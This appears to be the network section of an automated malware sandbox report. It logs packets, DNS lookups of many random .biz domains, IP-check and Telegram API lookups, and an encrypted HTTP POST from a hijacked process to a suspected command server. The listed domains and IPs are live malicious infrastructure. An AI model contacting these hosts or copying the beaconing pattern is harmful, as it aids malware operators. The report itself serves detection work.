Dec 16, 2024 14:11:00.958836079 CET	80	49745	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:01.082597017 CET	49748	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:01.202821016 CET	80	49748	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:01.202923059 CET	49748	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:01.203083992 CET	49748	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:01.203103065 CET	49748	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:01.322900057 CET	80	49748	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:01.322916031 CET	80	49748	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:03.350689888 CET	80	49736	172.234.222.138	192.168.2.4
Dec 16, 2024 14:11:03.352351904 CET	49736	80	192.168.2.4	172.234.222.138
Dec 16, 2024 14:11:03.378371954 CET	49736	80	192.168.2.4	172.234.222.138
Dec 16, 2024 14:11:03.498276949 CET	80	49736	172.234.222.138	192.168.2.4
Dec 16, 2024 14:11:23.104079008 CET	80	49748	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:23.104306936 CET	49748	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:23.104306936 CET	49748	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:23.224268913 CET	80	49748	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:24.393264055 CET	49766	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:24.513350964 CET	80	49766	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:24.516927958 CET	49766	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:24.516927958 CET	49766	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:24.516927958 CET	49766	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:24.637013912 CET	80	49766	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:24.637032986 CET	80	49766	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:33.070413113 CET	80	49731	158.101.44.242	192.168.2.4
Dec 16, 2024 14:11:33.070494890 CET	49731	80	192.168.2.4	158.101.44.242
Dec 16, 2024 14:11:38.699665070 CET	80	49738	72.52.179.174	192.168.2.4
Dec 16, 2024 14:11:38.699753046 CET	49738	80	192.168.2.4	72.52.179.174
Dec 16, 2024 14:11:38.699970007 CET	49738	80	192.168.2.4	72.52.179.174
Dec 16, 2024 14:11:38.820806980 CET	80	49738	72.52.179.174	192.168.2.4
Dec 16, 2024 14:11:46.431463957 CET	80	49766	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:46.431545973 CET	49766	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:46.432039022 CET	49766	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:46.434683084 CET	49816	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:46.552932024 CET	80	49766	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:46.555744886 CET	80	49816	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:46.555833101 CET	49816	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:46.556301117 CET	49816	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:46.556301117 CET	49816	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:46.676059961 CET	80	49816	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:46.676079035 CET	80	49816	82.112.184.197	192.168.2.4
Dec 16, 2024 14:12:02.371248007 CET	49731	80	192.168.2.4	158.101.44.242
Dec 16, 2024 14:12:02.491653919 CET	80	49731	158.101.44.242	192.168.2.4
Dec 16, 2024 14:12:08.462932110 CET	80	49816	82.112.184.197	192.168.2.4
Dec 16, 2024 14:12:08.462989092 CET	49816	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:12:08.463572979 CET	49816	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:12:08.563811064 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:12:08.584455967 CET	80	49816	82.112.184.197	192.168.2.4
Dec 16, 2024 14:12:08.684274912 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:12:08.684341908 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:12:09.019083977 CET	49867	80	192.168.2.4	47.129.31.212
Dec 16, 2024 14:12:09.138959885 CET	80	49867	47.129.31.212	192.168.2.4
Dec 16, 2024 14:12:09.139024973 CET	49867	80	192.168.2.4	47.129.31.212
Dec 16, 2024 14:12:09.139326096 CET	49867	80	192.168.2.4	47.129.31.212
Dec 16, 2024 14:12:09.139336109 CET	49867	80	192.168.2.4	47.129.31.212
Dec 16, 2024 14:12:09.259021044 CET	80	49867	47.129.31.212	192.168.2.4
Dec 16, 2024 14:12:09.259036064 CET	80	49867	47.129.31.212	192.168.2.4
Dec 16, 2024 14:12:11.174906015 CET	80	49867	47.129.31.212	192.168.2.4
Dec 16, 2024 14:12:11.174926996 CET	80	49867	47.129.31.212	192.168.2.4
Dec 16, 2024 14:12:11.174985886 CET	49867	80	192.168.2.4	47.129.31.212
Dec 16, 2024 14:12:11.181034088 CET	49867	80	192.168.2.4	47.129.31.212
Dec 16, 2024 14:12:11.300826073 CET	80	49867	47.129.31.212	192.168.2.4
Dec 16, 2024 14:12:11.806859016 CET	49873	80	192.168.2.4	13.251.16.150
Dec 16, 2024 14:12:11.926748037 CET	80	49873	13.251.16.150	192.168.2.4
Dec 16, 2024 14:12:11.926831007 CET	49873	80	192.168.2.4	13.251.16.150
Dec 16, 2024 14:12:11.927006006 CET	49873	80	192.168.2.4	13.251.16.150
Dec 16, 2024 14:12:11.927031994 CET	49873	80	192.168.2.4	13.251.16.150
Dec 16, 2024 14:12:12.046782970 CET	80	49873	13.251.16.150	192.168.2.4
Dec 16, 2024 14:12:12.046803951 CET	80	49873	13.251.16.150	192.168.2.4
Dec 16, 2024 14:12:13.949496984 CET	80	49873	13.251.16.150	192.168.2.4
Dec 16, 2024 14:12:13.949620008 CET	80	49873	13.251.16.150	192.168.2.4
Dec 16, 2024 14:12:13.949673891 CET	49873	80	192.168.2.4	13.251.16.150
Dec 16, 2024 14:12:13.949771881 CET	49873	80	192.168.2.4	13.251.16.150
Dec 16, 2024 14:12:14.072128057 CET	80	49873	13.251.16.150	192.168.2.4
Dec 16, 2024 14:12:14.530107975 CET	49884	80	192.168.2.4	44.221.84.105
Dec 16, 2024 14:12:14.650038004 CET	80	49884	44.221.84.105	192.168.2.4
Dec 16, 2024 14:12:14.650150061 CET	49884	80	192.168.2.4	44.221.84.105
Dec 16, 2024 14:12:14.650361061 CET	49884	80	192.168.2.4	44.221.84.105
Dec 16, 2024 14:12:14.650832891 CET	49884	80	192.168.2.4	44.221.84.105
Dec 16, 2024 14:12:14.770418882 CET	80	49884	44.221.84.105	192.168.2.4
Dec 16, 2024 14:12:14.770746946 CET	80	49884	44.221.84.105	192.168.2.4
Dec 16, 2024 14:12:15.746413946 CET	80	49884	44.221.84.105	192.168.2.4
Dec 16, 2024 14:12:15.746591091 CET	80	49884	44.221.84.105	192.168.2.4
Dec 16, 2024 14:12:15.746629000 CET	49884	80	192.168.2.4	44.221.84.105
Dec 16, 2024 14:12:15.746673107 CET	49884	80	192.168.2.4	44.221.84.105
Dec 16, 2024 14:12:15.866425037 CET	80	49884	44.221.84.105	192.168.2.4
Dec 16, 2024 14:12:16.566016912 CET	49890	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:12:16.685925007 CET	80	49890	18.141.10.107	192.168.2.4
Dec 16, 2024 14:12:16.686014891 CET	49890	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:12:16.686177969 CET	49890	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:12:16.686197996 CET	49890	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:12:16.806143045 CET	80	49890	18.141.10.107	192.168.2.4
Dec 16, 2024 14:12:16.806166887 CET	80	49890	18.141.10.107	192.168.2.4
Dec 16, 2024 14:12:18.691659927 CET	80	49890	18.141.10.107	192.168.2.4
Dec 16, 2024 14:12:18.691859961 CET	80	49890	18.141.10.107	192.168.2.4
Dec 16, 2024 14:12:18.691909075 CET	49890	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:12:18.691977978 CET	49890	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:12:18.811659098 CET	80	49890	18.141.10.107	192.168.2.4
Dec 16, 2024 14:12:19.227161884 CET	49896	80	192.168.2.4	172.234.222.143
Dec 16, 2024 14:12:19.347076893 CET	80	49896	172.234.222.143	192.168.2.4
Dec 16, 2024 14:12:19.347181082 CET	49896	80	192.168.2.4	172.234.222.143
Dec 16, 2024 14:12:19.347909927 CET	49896	80	192.168.2.4	172.234.222.143
Dec 16, 2024 14:12:19.347909927 CET	49896	80	192.168.2.4	172.234.222.143
Dec 16, 2024 14:12:19.467744112 CET	80	49896	172.234.222.143	192.168.2.4
Dec 16, 2024 14:12:19.467825890 CET	80	49896	172.234.222.143	192.168.2.4
Dec 16, 2024 14:12:20.488104105 CET	80	49896	172.234.222.143	192.168.2.4
Dec 16, 2024 14:12:20.650509119 CET	49896	80	192.168.2.4	172.234.222.143
Dec 16, 2024 14:12:20.716762066 CET	49897	80	192.168.2.4	72.52.179.174
Dec 16, 2024 14:12:20.836788893 CET	80	49897	72.52.179.174	192.168.2.4
Dec 16, 2024 14:12:20.836862087 CET	49897	80	192.168.2.4	72.52.179.174
Dec 16, 2024 14:12:20.837055922 CET	49897	80	192.168.2.4	72.52.179.174
Dec 16, 2024 14:12:20.959336042 CET	80	49897	72.52.179.174	192.168.2.4
Dec 16, 2024 14:12:22.019236088 CET	80	49897	72.52.179.174	192.168.2.4
Dec 16, 2024 14:12:22.150408983 CET	49897	80	192.168.2.4	72.52.179.174
Dec 16, 2024 14:12:50.471704960 CET	80	49896	172.234.222.143	192.168.2.4
Dec 16, 2024 14:12:50.471827030 CET	49896	80	192.168.2.4	172.234.222.143
Dec 16, 2024 14:12:50.471893072 CET	49896	80	192.168.2.4	172.234.222.143
Dec 16, 2024 14:12:50.592353106 CET	80	49896	172.234.222.143	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 14:10:17.762489080 CET	57676	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:18.321604013 CET	53	57676	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:18.518769026 CET	60514	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:18.655978918 CET	53	60514	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:20.050776005 CET	61131	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:20.508304119 CET	63942	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:20.648664951 CET	53	63942	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:20.805500031 CET	53	61131	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:22.972980976 CET	58350	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:23.535981894 CET	53	58350	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:25.049166918 CET	53248	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:25.802452087 CET	53	53248	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:27.074299097 CET	55105	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:27.661479950 CET	53	55105	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:28.107222080 CET	55806	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:28.244983912 CET	53	55806	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:28.969362020 CET	53681	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:29.289145947 CET	53	53681	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:30.821801901 CET	61287	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:31.313303947 CET	53	61287	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:34.289138079 CET	65176	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:34.502809048 CET	53	65176	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:34.503647089 CET	53313	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:35.076901913 CET	53	53313	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:37.256336927 CET	57280	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:37.482505083 CET	53	57280	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:37.492661953 CET	57214	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:37.724349976 CET	53	57214	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:37.725570917 CET	53933	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:38.599750996 CET	53	53933	1.1.1.1	192.168.2.4
Dec 16, 2024 14:10:52.840471983 CET	56923	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:10:52.985663891 CET	53	56923	1.1.1.1	192.168.2.4
Dec 16, 2024 14:11:23.149178982 CET	59498	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:11:24.069719076 CET	53	59498	1.1.1.1	192.168.2.4
Dec 16, 2024 14:12:08.464411974 CET	61365	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:12:09.010910988 CET	53	61365	1.1.1.1	192.168.2.4
Dec 16, 2024 14:12:11.194032907 CET	54731	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:12:11.791445017 CET	53	54731	1.1.1.1	192.168.2.4
Dec 16, 2024 14:12:13.950501919 CET	61195	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:12:14.520155907 CET	53	61195	1.1.1.1	192.168.2.4
Dec 16, 2024 14:12:15.747282028 CET	55324	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:12:16.559056044 CET	53	55324	1.1.1.1	192.168.2.4
Dec 16, 2024 14:12:18.692641973 CET	63878	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:12:19.195611954 CET	53	63878	1.1.1.1	192.168.2.4
Dec 16, 2024 14:12:20.490696907 CET	51096	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:12:20.714555025 CET	53	51096	1.1.1.1	192.168.2.4
Dec 16, 2024 14:12:22.021290064 CET	53142	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:12:22.357326984 CET	53	53142	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 16, 2024 14:10:17.762489080 CET	192.168.2.4	1.1.1.1	0x38cb	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:18.518769026 CET	192.168.2.4	1.1.1.1	0x7f40	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:20.050776005 CET	192.168.2.4	1.1.1.1	0xac49	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:20.508304119 CET	192.168.2.4	1.1.1.1	0xaa7d	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:22.972980976 CET	192.168.2.4	1.1.1.1	0x405a	Standard query (0)	cvgrf.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:25.049166918 CET	192.168.2.4	1.1.1.1	0xb7ea	Standard query (0)	npukfztj.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:27.074299097 CET	192.168.2.4	1.1.1.1	0xdfbc	Standard query (0)	przvgke.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:28.107222080 CET	192.168.2.4	1.1.1.1	0xbe46	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:28.969362020 CET	192.168.2.4	1.1.1.1	0x2641	Standard query (0)	ww99.przvgke.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:30.821801901 CET	192.168.2.4	1.1.1.1	0xcb87	Standard query (0)	ww12.przvgke.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:34.289138079 CET	192.168.2.4	1.1.1.1	0x78a4	Standard query (0)	zlenh.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:34.503647089 CET	192.168.2.4	1.1.1.1	0x7f7f	Standard query (0)	knjghuig.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:37.256336927 CET	192.168.2.4	1.1.1.1	0x568c	Standard query (0)	uhxqin.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:37.492661953 CET	192.168.2.4	1.1.1.1	0x7f33	Standard query (0)	anpmnmxo.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:37.725570917 CET	192.168.2.4	1.1.1.1	0xafe	Standard query (0)	lpuegx.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:52.840471983 CET	192.168.2.4	1.1.1.1	0x9873	Standard query (0)	lpuegx.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:11:23.149178982 CET	192.168.2.4	1.1.1.1	0xe798	Standard query (0)	vjaxhpbji.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:08.464411974 CET	192.168.2.4	1.1.1.1	0x85b2	Standard query (0)	xlfhhhm.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:11.194032907 CET	192.168.2.4	1.1.1.1	0x1176	Standard query (0)	ifsaia.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:13.950501919 CET	192.168.2.4	1.1.1.1	0x60ef	Standard query (0)	saytjshyf.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:15.747282028 CET	192.168.2.4	1.1.1.1	0xd99	Standard query (0)	vcddkls.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:18.692641973 CET	192.168.2.4	1.1.1.1	0xbb5	Standard query (0)	fwiwk.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:20.490696907 CET	192.168.2.4	1.1.1.1	0xf882	Standard query (0)	ww99.fwiwk.biz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:22.021290064 CET	192.168.2.4	1.1.1.1	0x9e9e	Standard query (0)	ww7.fwiwk.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 16, 2024 14:10:18.321604013 CET	1.1.1.1	192.168.2.4	0x38cb	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:18.655978918 CET	1.1.1.1	192.168.2.4	0x7f40	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 14:10:18.655978918 CET	1.1.1.1	192.168.2.4	0x7f40	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:18.655978918 CET	1.1.1.1	192.168.2.4	0x7f40	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:18.655978918 CET	1.1.1.1	192.168.2.4	0x7f40	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:18.655978918 CET	1.1.1.1	192.168.2.4	0x7f40	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:18.655978918 CET	1.1.1.1	192.168.2.4	0x7f40	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:20.648664951 CET	1.1.1.1	192.168.2.4	0xaa7d	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:20.648664951 CET	1.1.1.1	192.168.2.4	0xaa7d	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:20.805500031 CET	1.1.1.1	192.168.2.4	0xac49	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:23.535981894 CET	1.1.1.1	192.168.2.4	0x405a	No error (0)	cvgrf.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:25.802452087 CET	1.1.1.1	192.168.2.4	0xb7ea	No error (0)	npukfztj.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:27.661479950 CET	1.1.1.1	192.168.2.4	0xdfbc	No error (0)	przvgke.biz		172.234.222.138	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:27.661479950 CET	1.1.1.1	192.168.2.4	0xdfbc	No error (0)	przvgke.biz		172.234.222.143	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:28.244983912 CET	1.1.1.1	192.168.2.4	0xbe46	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:29.289145947 CET	1.1.1.1	192.168.2.4	0x2641	No error (0)	ww99.przvgke.biz		72.52.179.174	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:31.313303947 CET	1.1.1.1	192.168.2.4	0xcb87	No error (0)	ww12.przvgke.biz	084725.parkingcrew.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 14:10:31.313303947 CET	1.1.1.1	192.168.2.4	0xcb87	No error (0)	084725.parkingcrew.net		76.223.26.96	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:31.313303947 CET	1.1.1.1	192.168.2.4	0xcb87	No error (0)	084725.parkingcrew.net		13.248.148.254	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:34.502809048 CET	1.1.1.1	192.168.2.4	0x78a4	Name error (3)	zlenh.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:35.076901913 CET	1.1.1.1	192.168.2.4	0x7f7f	No error (0)	knjghuig.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:37.482505083 CET	1.1.1.1	192.168.2.4	0x568c	Name error (3)	uhxqin.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:37.724349976 CET	1.1.1.1	192.168.2.4	0x7f33	Name error (3)	anpmnmxo.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:38.599750996 CET	1.1.1.1	192.168.2.4	0xafe	No error (0)	lpuegx.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:10:52.985663891 CET	1.1.1.1	192.168.2.4	0x9873	No error (0)	lpuegx.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:11:24.069719076 CET	1.1.1.1	192.168.2.4	0xe798	No error (0)	vjaxhpbji.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:09.010910988 CET	1.1.1.1	192.168.2.4	0x85b2	No error (0)	xlfhhhm.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:11.791445017 CET	1.1.1.1	192.168.2.4	0x1176	No error (0)	ifsaia.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:14.520155907 CET	1.1.1.1	192.168.2.4	0x60ef	No error (0)	saytjshyf.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:16.559056044 CET	1.1.1.1	192.168.2.4	0xd99	No error (0)	vcddkls.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:19.195611954 CET	1.1.1.1	192.168.2.4	0xbb5	No error (0)	fwiwk.biz		172.234.222.143	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:19.195611954 CET	1.1.1.1	192.168.2.4	0xbb5	No error (0)	fwiwk.biz		172.234.222.138	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:20.714555025 CET	1.1.1.1	192.168.2.4	0xf882	No error (0)	ww99.fwiwk.biz		72.52.179.174	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:12:22.357326984 CET	1.1.1.1	192.168.2.4	0x9e9e	No error (0)	ww7.fwiwk.biz	76899.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 14:12:22.357326984 CET	1.1.1.1	192.168.2.4	0x9e9e	No error (0)	76899.bodis.com		199.59.243.227	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

pywolwnvd.biz

checkip.dyndns.org

ssbzmoy.biz

cvgrf.biz

npukfztj.biz

przvgke.biz

ww99.przvgke.biz

ww12.przvgke.biz

knjghuig.biz

lpuegx.biz

vjaxhpbji.biz

xlfhhhm.biz

ifsaia.biz

saytjshyf.biz

vcddkls.biz

fwiwk.biz

ww99.fwiwk.biz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	54.244.188.177	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:10:18.760102987 CET	350	OUT	POST /vayts HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:10:18.760142088 CET	850	OUT	Data Raw: 3d b3 84 68 e4 60 cf cc 46 03 00 00 b4 6f b6 78 c6 c2 1b 2e ab e3 a5 ae 76 4c f9 df 27 5e b5 1d 80 3d 85 ff 09 30 11 f9 cd fc e7 a7 36 dc 8e 17 89 4b 00 8c 79 e3 f0 50 50 56 1e d7 0f 17 97 ef 04 11 e7 75 87 07 b2 c8 57 2e 54 f8 a0 25 96 13 e1 e9 Data Ascii: =h`Fox.vL'^=06KyPPVuW.T%Qa} QVII.ZJ$%E1!i?X?/,~dv]7>Rb+c7G+c>n:Wf]rM^kGuxhbF-Uh1a
Dec 16, 2024 14:10:20.041053057 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 13:10:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b810ae0d2268d11b6797ee538c34d63a\|8.46.123.189\|1734354619\|1734354619\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	158.101.44.242	80	7360	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:10:18.886172056 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:10:20.088876009 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:10:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 62ff3195da4baf2648254ff213879f7e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 14:10:20.094667912 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 14:10:20.468091011 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:10:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c97f6ba1d59e18b7dff915a38710daf4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 14:10:27.687941074 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
